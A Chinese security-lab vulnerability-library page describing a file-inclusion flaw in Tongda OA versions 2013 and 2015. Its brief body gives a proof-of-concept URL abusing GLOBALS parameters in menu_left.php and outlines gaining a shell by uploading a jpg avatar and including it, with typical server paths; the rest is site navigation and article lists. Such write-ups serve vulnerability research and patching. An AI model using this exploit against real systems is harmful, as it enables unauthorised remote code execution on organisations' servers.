通达oa 文件包含漏洞-漏洞文库小世界-安全文库-NGC660安全实验室

通达oa 文件包含漏洞

好想告诉你徽章-备受喜爱-NGC660安全实验室等级-LV4-NGC660安全实验室1年前发布
210

通达oa 文件包含漏洞

漏洞影响

2013、2015版本

复现过程

poc

http://url/inc/menu_left.php?GLOBALS[MENU_LEFT][A][module][1]=a&include_file=../inc/js/menu_left.js

通常情况下,在控制⾯板中上传⼀个jpg头像,然后利用该⻚面的⽂件包含getshell。通达OA网站的根⽬录 一般在D:\MYOA\webroot中,头像附件一般在D:\MYOA\webroot\attachment\avatar\XXX.jpg

82f92fc75f1509061984f53efe7095f7

评分
欢迎为Ta评分
赏点小钱
分享
请登录后发表评论

    请登录后查看回复内容

用户封面
好想告诉你的头像-NGC660安全实验室
【作业】下内网之隧道代理05.17
【作业】5.10 漏洞复现-Thinkphp+shiro550+log4j2
CSZ CMS 1.2.7 储存型xss
CVE-2019-13086 CSZ CMS 1.2.2 sql注入漏洞
CVE-2018-7662 Couchcms 2.0 存在路径泄露漏洞
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具-NGC660安全实验室
2.6W+人已阅读
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具
TOP1
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant-NGC660安全实验室
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant
2年前6734人已阅读
TOP2
HTB靶机渗透系列之Sniper -NGC660安全实验室
HTB靶机渗透系列之Sniper 
2年前5784人已阅读
TOP3
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击-NGC660安全实验室
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击
2年前1448人已阅读
TOP4
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉-NGC660安全实验室
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉
2年前1396人已阅读
TOP5
【初级】Next.js目录遍历-NGC660安全实验室
【初级】Next.js目录遍历
2年前1172人已阅读
TOP6
【初级】WP Statistics SQL注入 (CVE-2022-25149)-NGC660安全实验室
【初级】WP Statistics SQL注入 (CVE-2022-25149)
2年前905人已阅读
TOP7
【初级】jira 未授权访问-NGC660安全实验室
【初级】jira 未授权访问
2年前733人已阅读
TOP8
【初级】artifactory 未授权访问-NGC660安全实验室
【初级】artifactory 未授权访问
2年前702人已阅读
TOP9
网络安全应急响应工具包合集-NGC660安全实验室
网络安全应急响应工具包合集
1年前671人已阅读
TOP10
圈子开耕者
分类-最近更新-NGC660安全实验室 11.5W+
最近更新
最近更新文章...
468篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
SubOver:一款功能强大的子域名接管测试工具
1年前
如何使用53R3N17Y完成主机网络侦查和信息收集任务
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
如何使用DragonCastle从LSASS进程中提取NTLM哈希
1年前
分类-安全新闻-NGC660安全实验室 2.1W+
安全新闻
分享安全时事,安全新闻播报推送
86篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
探析人工智能对网络安全的真正潜在影响
1年前
微信闪退BUG:一张神奇的二维码图片
1年前
印度跨国银行遭遇数据泄露,数百万敏感数据被公开访问
1年前
发布文章发布尘埃
扫码添加微信-NGC660安全实验室
在手机上浏览此页面